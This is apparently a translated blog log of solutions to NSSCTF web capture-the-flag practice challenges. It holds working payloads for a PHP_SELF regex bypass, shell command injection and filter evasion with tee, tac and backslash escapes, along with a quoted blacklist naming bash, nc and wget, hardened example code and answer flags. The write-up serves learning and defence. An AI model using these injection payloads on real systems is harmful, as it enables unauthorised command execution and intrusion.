NSSCTF Web challenge practice log (12)

NSSCTF platform: https://www.nssctf.cn/
PS: Remember to change flag to NSSCTF in every flag you submit.

[NCTF 2018] Check-in questions:

The challenge opens on search.php. I looked at the source code but could not find the flag there. In the end I found it in the response headers of index.php!

NSSCTF{w3lc0m3_t0_nctf2018hhhhhhhhhhhh}

[Crane City Cup 2021] EasyP:

<?php
include 'utils.php';

if (isset($_POST['guess'])) {
    $guess = (string) $_POST['guess'];
    if ($guess === $secret) {
        $message = 'Congratulations! The flag is: ' . $flag;
    } else {
        $message = 'Wrong. Try Again';
    }
}

if (preg_match('/utils\.php\/*$/i', $_SERVER['PHP_SELF'])) {
    exit("hacker :)");
}

if (preg_match('/show_source/', $_SERVER['REQUEST_URI'])){
    exit("hacker :)");
}

if (isset($_GET['show_source'])) {
    highlight_file(basename($_SERVER['PHP_SELF']));
    exit();
}else{
    show_source(__FILE__);
}
?>

Analyzing the code: $_SERVER['PHP_SELF'] is the path of the script being called.
$_SERVER['REQUEST_URI'] obtains the current URI, that is, the complete address path after the domain name.
The basename function returns the file name part of the path.

Now you need to bypass preg_match('/utils\.php\/*$/i', $_SERVER['PHP_SELF']). The regex is bypassed as long as you add a non-ASCII character, for example a Chinese character, after utils.php/. show_source cannot be entered directly because of the regex match on REQUEST_URI, so change show_source to show[source to bypass that preg_match; PHP rewrites the [ in a parameter name to _, so $_GET['show_source'] is still set.
Add a character that is not in the ASCII table after index.php/utils.php (many will work).

payload:/index.php/utils.php/巧克力?show[source=1

NSSCTF{9ce4af3e-811f-49cd-a8f3-544efa897fb9}
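
The two regex gates and the parameter-name rewrite, modelled as pure functions in an added example (not the challenge's code). The function names are hypothetical, index.php is assumed to be the script shown above, and the request values are constructed from the payload on this page.

```php
<?php
// Added example, not the challenge's code. Function names are hypothetical.

// The page's logic as a pure function: returns the file that would be
// highlighted, or null when a regex gate answers "hacker :)".
function vulnerable_target(string $phpSelf, string $requestUri): ?string
{
    if (preg_match('/utils\.php\/*$/i', $phpSelf)) {
        return null;
    }
    if (preg_match('/show_source/', $requestUri)) {
        return null;
    }
    // parse_str() normalises parameter names the same way $_GET does,
    // so "show[source" arrives as "show_source".
    parse_str(explode('?', $requestUri, 2)[1] ?? '', $get);
    return isset($get['show_source']) ? basename($phpSelf) : 'index.php';
}

// Hardened: SCRIPT_NAME carries no PATH_INFO, the decision uses the parsed
// parameter, and the file shown is fixed instead of derived from the URL.
function hardened_target(string $scriptName, string $phpSelf, string $requestUri): ?string
{
    if ($phpSelf !== $scriptName) {
        return null;                 // reject any trailing path info
    }
    parse_str(explode('?', $requestUri, 2)[1] ?? '', $get);
    return isset($get['show_source']) ? 'index.php' : null;
}

// Constructed request values matching the payload shown on the page.
$self = '/index.php/utils.php/巧克力';
$uri  = $self . '?show[source=1';

// What basename() returns for the trailing non-ASCII segment depends on the
// platform's multibyte handling; the payload relies on it being skipped.
var_dump(vulnerable_target($self, $uri));
var_dump(hardened_target('/index.php', $self, $uri));
var_dump(hardened_target('/index.php', '/index.php', '/index.php?show_source=1'));
```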

[NSSCTF 2022 Spring Recruit]ezgame:

You are given the flag for scoring 65 points in the game (too lazy to play), so let's look through the JS instead and find FLAG in js/preload.js.

NSSCTF{c0700f5b-604f-4b8f-b017-4be822fb5de6}

[GXYCTF 2019]Ping Ping Ping:

This challenge was covered before; see: https://blog.csdn.net/Aluxian_/article/details/130053100?spm=1001.2014.3001.5501

Payload:?ip=127.0.0.1;cat$IFS$9`ls`

NSSCTF{8117affa-f16d-4085-b644-696ae9b83a2c}

[SWPUCTF 2021 Freshman Competition] finalrce:

<?php
highlight_file(__FILE__);
if(isset($_GET['url']))
{
    $url=$_GET['url'];
    if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url))
    {
        echo "Sorry,you can't use this.";
    }
    else
    {
        echo "Can you see anything?";
        exec($url);
    }
}

The preg_match function performs a regular expression match. Here you can see that a lot of commands are filtered, including cat and ls, which cannot be used. You can use the tee command.

Since ls is filtered by the regular expression, we also need to bypass preg_match with the escape character, a backslash (\).

tee reads from standard input and then writes to both standard output and files. Payload:?url=l\s / |tee 1.txt, and then access 1.txt to see flllllaaaaaaggggggg

tac is not filtered, so construct the payload directly. Payload:?url=tac /flllll\aaaaaaggggggg | tee 9.txt (remember the space after |), then access 9.txt

NSSCTF{9dccd221-4cd1-41f7-9feb-3c463839eb88}
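
Why the substring blacklist fails and what an allowlist looks like instead, as an added example (not the challenge's code). The function names and the two allowed actions are hypothetical; the inputs are one plain command plus the two payloads quoted above.

```php
<?php
// Added example, not the challenge's code. Names below are hypothetical.

// The blacklist exactly as it appears in the page's source.
const BLACKLIST = '/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i';

function blacklist_allows(string $url): bool
{
    return preg_match(BLACKLIST, $url) !== 1;
}

// Hardened alternative (assumed design): the request only selects a key;
// the argv is fixed server-side and would be run without a shell, e.g.
// with proc_open($argv, ...) on PHP 7.4+.
const ALLOWED_ACTIONS = [
    'uptime' => ['/usr/bin/uptime'],
    'date'   => ['/bin/date', '+%F'],
];

function allowlisted_argv(string $action): ?array
{
    return ALLOWED_ACTIONS[$action] ?? null;
}

// Inputs: plain commands plus the two payloads quoted on the page.
$inputs = [
    'ls /',
    'l\s / |tee 1.txt',
    'tac /flllll\aaaaaaggggggg | tee 9.txt',
    'date',
];

foreach ($inputs as $in) {
    printf(
        "%-40s blacklist: %-7s allowlist: %s\n",
        $in,
        blacklist_allows($in) ? 'passes' : 'blocked',
        allowlisted_argv($in) === null ? 'rejected' : 'accepted'
    );
}
```

The blacklist matches on raw substrings while the shell removes the backslash before resolving the command name, so the two never compare the same string; the allowlist never hands request text to a shell at all.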

[NISACTF 2022]checkin:

Tip: try copying the source code and viewing it in 010 Editor.

Spot the special Unicode characters, paste the code into VS Code, then copy them out and URL-encode them.

Payload:?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%A9%E2%81%A6N1SACTF

NSSCTF{5359287b-d34e-4df8-ac95-1670f011cf2c}
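
A scanner for the invisible characters involved here, as an added example (not the challenge's code): it URL-decodes the second parameter name from the payload above and reports every Unicode bidirectional control it contains. The function name find_bidi_controls is hypothetical.

```php
<?php
// Added example, not the challenge's code. Function name is hypothetical.

// Unicode bidirectional controls: embeddings/overrides U+202A..U+202E and
// isolates U+2066..U+2069. They are invisible but reorder displayed text.
const BIDI_CONTROLS = '/[\x{202A}-\x{202E}\x{2066}-\x{2069}]/u';

// Returns [byte offset, "U+XXXX"] for every bidi control found in $text.
function find_bidi_controls(string $text): array
{
    preg_match_all(BIDI_CONTROLS, $text, $m, PREG_OFFSET_CAPTURE);
    $hits = [];
    foreach ($m[0] as [$char, $offset]) {
        // json_encode() escapes non-ASCII as \uXXXX, giving the code point
        // without needing the mbstring extension.
        $hex = strtoupper(substr(json_encode($char), 3, 4));
        $hits[] = [$offset, 'U+' . $hex];
    }
    return $hits;
}

// The second parameter name from the page's payload, URL-decoded.
$name = rawurldecode('%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan');

foreach (find_bidi_controls($name) as [$offset, $cp]) {
    echo "byte $offset: $cp\n";
}

// Visible remainder once the controls are stripped.
echo preg_replace(BIDI_CONTROLS, '', $name), "\n";
```

The same function can be run over source files in code review or CI to flag identifiers and string literals whose displayed order differs from their byte order.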

[UUCTF 2022 Freshman Competition] websign:

[GDOUCTF 2023]hate eat snake:

Beat the game to get the flag, or first G a few times, then click Cancel, wait about 60 seconds, and press space to get the flag.

[HNCTF 2022 Week1]2048:

It's the classic game. Press F12 to check the source code and find the js, open it and look at what alert() outputs, then copy that into the console and run it.

NSSCTF{53160c888e25c3f828b23e316a7ae083}

[HDCTF 2023]Welcome To HDCTF 2023:

Playing the game normally gives you the FLAG, or go into the js, find the JSFuck code, and decode it.

NSSCTF{We13ome_t@_HDCTF_2o23}

Origin blog.csdn.net/Aluxian_/article/details/130819310